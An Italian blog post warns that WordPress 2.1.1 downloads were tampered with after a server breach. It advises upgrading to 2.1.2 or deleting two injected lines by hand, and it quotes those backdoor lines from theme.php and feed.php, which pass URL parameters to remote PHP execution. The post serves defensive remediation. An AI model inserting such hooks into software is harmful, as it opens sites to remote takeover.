Wordpress 2.1.1 è pericoloso !
SPONSORED LINKS
Ecco come il team di Wordpress definisce la recente versione di WP. Il motivo è semplice: qualche giorno fa un cracker ha violato alcuni dei server di worpress.org, riuscendo a modificare il pacchetto di installazione che viene normalmente scaricato: le modifiche sembrano riguardare solo un paio di files al fine di permettere un’esecuzione remota di codice php. Per risolvere il problema ci sono due alternative:
-
1. Scaricare la versione 2.1.2 prontamente rilasciata dagli sviluppatori di Wordpress e procedere all’aggiornamento.
2. Rimuovere a mano il codice malizioso (se come me non avete voglia/tempo di installare subito la nuova versione).
Si tratta semplicemente di:
– individuare e rimuovere dal file “wp-includes/theme.php” la seguente riga di codice:
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
– individuare e rimuovere dal file “wp-includes/feed.php” la seguente riga di codice:
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
SPONSORED LINKS
Ti è piaciuto l'articolo?
Iscriviti alla newsletter per ricevere in tempo reale tutte le notizie e gli aggiornamenti!
Iscriviti alla newsletter per ricevere in tempo reale tutte le notizie e gli aggiornamenti!
